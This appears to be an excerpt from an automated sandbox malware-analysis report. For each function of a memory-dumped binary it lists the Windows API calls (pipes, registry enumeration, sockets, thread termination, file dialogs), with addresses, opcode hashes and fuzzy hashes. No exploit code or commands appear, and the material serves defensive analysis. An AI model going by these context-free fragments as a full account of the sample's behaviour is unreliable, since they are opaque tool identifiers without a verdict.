                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 007778AF
                                                                • SysAllocString.OLEAUT32(?), ref: 007778BD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                • String ID:
                                                                • API String ID: 3761583154-0
                                                                • Opcode ID: f5413f3f650ec9efe72cfbf79bfe77233f4242abc7f44ba1df45c79029faaa21
                                                                • Instruction ID: 9e3dcb49674d962a2c720522d141ad1aedd61244d11c3c988cc51fe0af1a02c4
                                                                • Opcode Fuzzy Hash: f5413f3f650ec9efe72cfbf79bfe77233f4242abc7f44ba1df45c79029faaa21
                                                                • Instruction Fuzzy Hash: 36218E71608204BF9F159BA8DC8CDBA77ECEB493A0710C125F919CB2A1DA78DC41CB69
                                                                APIs
                                                                • GetStdHandle.KERNEL32(0000000C), ref: 007804F2
                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0078052E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CreateHandlePipe
                                                                • String ID: nul
                                                                • API String ID: 1424370930-2873401336
                                                                • Opcode ID: b40fa0838365418bacb923c96461c477e7681888106ead078c16920ae6fd27bd
                                                                • Instruction ID: 7b8f6bda2c5ffe09df9b6f25b1e90c2463d79f61a8da658618865e81941c0a9d
                                                                • Opcode Fuzzy Hash: b40fa0838365418bacb923c96461c477e7681888106ead078c16920ae6fd27bd
                                                                • Instruction Fuzzy Hash: F2218071640305AFDB20AF29DC08E9A77F4BF85724F204A19F8A1D62E0D7749968CFB0
                                                                APIs
                                                                • GetStdHandle.KERNEL32(000000F6), ref: 007805C6
                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00780601
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CreateHandlePipe
                                                                • String ID: nul
                                                                • API String ID: 1424370930-2873401336
                                                                • Opcode ID: ec328e11b76ccff67adcac441180115cad45139a064b99ef8e98e3e47f8efb8d
                                                                • Instruction ID: c91ddfd124518ab22963c918711ac8f18e4687b9b3f0c2015bb1eba70a67dbd6
                                                                • Opcode Fuzzy Hash: ec328e11b76ccff67adcac441180115cad45139a064b99ef8e98e3e47f8efb8d
                                                                • Instruction Fuzzy Hash: 8521B775640305AFDB60AF68CC08A5A77F4BF85720F204B19F8B1D32D0E7749864CBA0
                                                                APIs
                                                                  • Part of subcall function 0071600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0071604C
                                                                  • Part of subcall function 0071600E: GetStockObject.GDI32(00000011), ref: 00716060
                                                                  • Part of subcall function 0071600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0071606A
                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007A4112
                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007A411F
                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007A412A
                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007A4139
                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007A4145
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                • String ID: Msctls_Progress32
                                                                • API String ID: 1025951953-3636473452
                                                                • Opcode ID: af3995b0c90db14dfc0402c096d5c7453315158fbb1fda31bb7ec055b6f5b108
                                                                • Instruction ID: 1b83b845f1595856cc86a4abe0b7f6901d3b5097a2e3b11519934f9dc5678275
                                                                • Opcode Fuzzy Hash: af3995b0c90db14dfc0402c096d5c7453315158fbb1fda31bb7ec055b6f5b108
                                                                • Instruction Fuzzy Hash: 5E11B6B214011DBEEF119F64CC85EE77F9DEF49798F004211B618A6150C6769C61DBA4
                                                                APIs
                                                                  • Part of subcall function 0074D7A3: _free.LIBCMT ref: 0074D7CC
                                                                • _free.LIBCMT ref: 0074D82D
                                                                  • Part of subcall function 007429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0074D7D1,00000000,00000000,00000000,00000000,?,0074D7F8,00000000,00000007,00000000,?,0074DBF5,00000000), ref: 007429DE
                                                                  • Part of subcall function 007429C8: GetLastError.KERNEL32(00000000,?,0074D7D1,00000000,00000000,00000000,00000000,?,0074D7F8,00000000,00000007,00000000,?,0074DBF5,00000000,00000000), ref: 007429F0
                                                                • _free.LIBCMT ref: 0074D838
                                                                • _free.LIBCMT ref: 0074D843
                                                                • _free.LIBCMT ref: 0074D897
                                                                • _free.LIBCMT ref: 0074D8A2
                                                                • _free.LIBCMT ref: 0074D8AD
                                                                • _free.LIBCMT ref: 0074D8B8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                • Instruction ID: b320a4b62d0a679d12d76f64c39e08dea60116b76b557046721243a63fd439b6
                                                                • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                • Instruction Fuzzy Hash: D111DD71541B04EBE932BFB1CC4BFCB7BDC6F05700F804825B2D9A65A2DB79B9164A50
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0077DA74
                                                                • LoadStringW.USER32(00000000), ref: 0077DA7B
                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0077DA91
                                                                • LoadStringW.USER32(00000000), ref: 0077DA98
                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0077DADC
                                                                Strings
                                                                • %s (%d) : ==> %s: %s %s, xrefs: 0077DAB9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: HandleLoadModuleString$Message
                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                • API String ID: 4072794657-3128320259
                                                                • Opcode ID: 54ca8737d381320f9bdd0e509c3768f78c1f120ad13d7826effbdc8666f8b3c9
                                                                • Instruction ID: 338dbc0c5e1da14efc52f98b726e3c234bd3d4ebef394f32c4e02f25a59f4b12
                                                                • Opcode Fuzzy Hash: 54ca8737d381320f9bdd0e509c3768f78c1f120ad13d7826effbdc8666f8b3c9
                                                                • Instruction Fuzzy Hash: E50162F25002087FEB11DBA0DD89EE7336CEB09741F408496B70AE2041EA789E844F74
                                                                APIs
                                                                • InterlockedExchange.KERNEL32(012EEA30,012EEA30), ref: 0078097B
                                                                • EnterCriticalSection.KERNEL32(012EEA10,00000000), ref: 0078098D
                                                                • TerminateThread.KERNEL32(00000000,000001F6), ref: 0078099B
                                                                • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 007809A9
                                                                • CloseHandle.KERNEL32(00000000), ref: 007809B8
                                                                • InterlockedExchange.KERNEL32(012EEA30,000001F6), ref: 007809C8
                                                                • LeaveCriticalSection.KERNEL32(012EEA10), ref: 007809CF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                • String ID:
                                                                • API String ID: 3495660284-0
                                                                • Opcode ID: 8ff25daf169209225ff19b02cd595b3a0898eadb738b21e244c51b329fcfd4f6
                                                                • Instruction ID: 21c661b928f8a2bb304b205e712d579faaef1b687436dda6ecf709f7da615aa3
                                                                • Opcode Fuzzy Hash: 8ff25daf169209225ff19b02cd595b3a0898eadb738b21e244c51b329fcfd4f6
                                                                • Instruction Fuzzy Hash: E8F04431542502FBD7425F94EE8DBD67B35FF42702F405015F101508A0CB78A475CF95
                                                                APIs
                                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00791DC0
                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00791DE1
                                                                • WSAGetLastError.WSOCK32 ref: 00791DF2
                                                                • htons.WSOCK32(?,?,?,?,?), ref: 00791EDB
                                                                • inet_ntoa.WSOCK32(?), ref: 00791E8C
                                                                  • Part of subcall function 007739E8: _strlen.LIBCMT ref: 007739F2
                                                                  • Part of subcall function 00793224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0078EC0C), ref: 00793240
                                                                • _strlen.LIBCMT ref: 00791F35
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                • String ID:
                                                                • API String ID: 3203458085-0
                                                                • Opcode ID: c6cb28f33c8b0e28262d60dcd7584e44704c6ac37d9724bd588c9c7c4df6b996
                                                                • Instruction ID: 7746c9cfa262d3f62e11df8b7163847667d24efe628348686620843d4748bc69
                                                                • Opcode Fuzzy Hash: c6cb28f33c8b0e28262d60dcd7584e44704c6ac37d9724bd588c9c7c4df6b996
                                                                • Instruction Fuzzy Hash: D8B12531204341EFCB24DF24D889E6A77E5AF85318F94854CF4564B2E2DB39ED82CB91
                                                                APIs
                                                                • __allrem.LIBCMT ref: 007400BA
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007400D6
                                                                • __allrem.LIBCMT ref: 007400ED
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0074010B
                                                                • __allrem.LIBCMT ref: 00740122
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00740140
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                • String ID:
                                                                • API String ID: 1992179935-0
                                                                • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                • Instruction ID: 934cd40fed86ad28cbe13f1e092e33dd65c2e715ff2e28a3c58434ae9a1df0b8
                                                                • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                • Instruction Fuzzy Hash: CF81F676A00706EBE720AE39CC45B6F73E9AF51364F24453AFA51D7682E778DD008B90
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,007382D9,007382D9,?,?,?,0074644F,00000001,00000001,8BE85006), ref: 00746258
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0074644F,00000001,00000001,8BE85006,?,?,?), ref: 007462DE
                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007463D8
                                                                • __freea.LIBCMT ref: 007463E5
                                                                  • Part of subcall function 00743820: RtlAllocateHeap.NTDLL(00000000,?,007E1444,?,0072FDF5,?,?,0071A976,00000010,007E1440,007113FC,?,007113C6,?,00711129), ref: 00743852
                                                                • __freea.LIBCMT ref: 007463EE
                                                                • __freea.LIBCMT ref: 00746413
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1414292761-0
                                                                • Opcode ID: 365f97954fd25fcf71ab2548235e651a749657fb7dbb8b6e2ccd769453307e5c
                                                                • Instruction ID: d003556acf7cc89bcb35faa0134dfadf6f7f799ecc34295b25a0b934bb3ccb50
                                                                • Opcode Fuzzy Hash: 365f97954fd25fcf71ab2548235e651a749657fb7dbb8b6e2ccd769453307e5c
                                                                • Instruction Fuzzy Hash: 1951E172A00256ABEB258F64CC85EBF7BAAEF46750F144669FC05D6180EB7CDC40C6A1
                                                                APIs
                                                                  • Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD
                                                                  • Part of subcall function 0079C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0079B6AE,?,?), ref: 0079C9B5
                                                                  • Part of subcall function 0079C998: _wcslen.LIBCMT ref: 0079C9F1
                                                                  • Part of subcall function 0079C998: _wcslen.LIBCMT ref: 0079CA68
                                                                  • Part of subcall function 0079C998: _wcslen.LIBCMT ref: 0079CA9E
                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0079BCCA
                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0079BD25
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0079BD6A
                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0079BD99
                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0079BDF3
                                                                • RegCloseKey.ADVAPI32(?), ref: 0079BDFF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                • String ID:
                                                                • API String ID: 1120388591-0
                                                                • Opcode ID: 79b3d7ad48935c366855892e9be1a37f775f2f3477c8eb08c324fef2cda948a8
                                                                • Instruction ID: e42279537fe5cf3be91be60ad1afef9cf88d2b0e0539ac95392fab1511ba2836
                                                                • Opcode Fuzzy Hash: 79b3d7ad48935c366855892e9be1a37f775f2f3477c8eb08c324fef2cda948a8
                                                                • Instruction Fuzzy Hash: 7B81CD30208241EFCB14DF24D995E6ABBE5FF85308F14885CF5594B2A2DB39ED45CB92
                                                                APIs
                                                                • VariantInit.OLEAUT32(00000035), ref: 0076F7B9
                                                                • SysAllocString.OLEAUT32(00000001), ref: 0076F860
                                                                • VariantCopy.OLEAUT32(0076FA64,00000000), ref: 0076F889
                                                                • VariantClear.OLEAUT32(0076FA64), ref: 0076F8AD
                                                                • VariantCopy.OLEAUT32(0076FA64,00000000), ref: 0076F8B1
                                                                • VariantClear.OLEAUT32(?), ref: 0076F8BB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Variant$ClearCopy$AllocInitString
                                                                • String ID:
                                                                • API String ID: 3859894641-0
                                                                • Opcode ID: 39be56acca62131d513032b652e6bcec09de1c867e5df132f6e8a0a09f99ac7a
                                                                • Instruction ID: 37b7ac6a2232b38e2e3b0c3cdc87627fd611a7bfc4dc6c07b787581a1d3ede74
                                                                • Opcode Fuzzy Hash: 39be56acca62131d513032b652e6bcec09de1c867e5df132f6e8a0a09f99ac7a
                                                                • Instruction Fuzzy Hash: 0951B631601310FACF24AB65E899B69B3E9EF45310B249467ED07DF291DB789C40CB96
                                                                APIs
                                                                  • Part of subcall function 00717620: _wcslen.LIBCMT ref: 00717625
                                                                  • Part of subcall function 00716B57: _wcslen.LIBCMT ref: 00716B6A
                                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 007894E5
                                                                • _wcslen.LIBCMT ref: 00789506
                                                                • _wcslen.LIBCMT ref: 0078952D
                                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00789585
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$FileName$OpenSave
                                                                • String ID: X
                                                                • API String ID: 83654149-3081909835
                                                                • Opcode ID: faa6a208e40cc01bbd6664c9fdd8684fa8770c0fd1f15055b1f75fba74fcee42
                                                                • Instruction ID: 32a75576053e7a41b55c92101b8a47a3cd18d51b7b4abc4e7a46a7615d474caa
                                                                • Opcode Fuzzy Hash: faa6a208e40cc01bbd6664c9fdd8684fa8770c0fd1f15055b1f75fba74fcee42
                                                                • Instruction Fuzzy Hash: F6E1B431504340DFD724EF28C885AAAB7E0BF85314F08856DF9999B2A2DB39ED45CB91
                                                                APIs
                                                                  • Part of subcall function 00729BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00729BB2
                                                                • BeginPaint.USER32(?,?,?), ref: 00729241
                                                                • GetWindowRect.USER32(?,?), ref: 007292A5
                                                                • ScreenToClient.USER32(?,?), ref: 007292C2
                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 007292D3
                                                                • EndPaint.USER32(?,?,?,?,?), ref: 00729321
                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 007671EA
                                                                  • Part of subcall function 00729339: BeginPath.GDI32(00000000), ref: 00729357
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                • String ID:
                                                                • API String ID: 3050599898-0
                                                                • Opcode ID: 8d77930e50d72ed3c1834ea5057273e897f5fdecc51344a90917529feb8c9b5c
                                                                • Instruction ID: d9877d1b4fdb6510af0a0610396975b7c1777886fa3b864099af432ffed39cb9
                                                                • Opcode Fuzzy Hash: 8d77930e50d72ed3c1834ea5057273e897f5fdecc51344a90917529feb8c9b5c
                                                                • Instruction Fuzzy Hash: A841D270105250EFD711DF24DC85FBA7BF8EB8A364F184229FA558B2A2C738A845DB61
                                                                APIs
                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0078080C
                                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00780847
                                                                • EnterCriticalSection.KERNEL32(?), ref: 00780863
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 007808DC
                                                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 007808F3
                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00780921
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                • String ID:
                                                                • API String ID: 3368777196-0
                                                                • Opcode ID: 85e6809665e191ddd7f471cfbb7a717050f5d47cd14b89acc75469d385de52aa
                                                                • Instruction ID: d4124d6d6eaa41f4709f2958efed107cfa10137ba232306d6a230d0ad6589633
                                                                • Opcode Fuzzy Hash: 85e6809665e191ddd7f471cfbb7a717050f5d47cd14b89acc75469d385de52aa
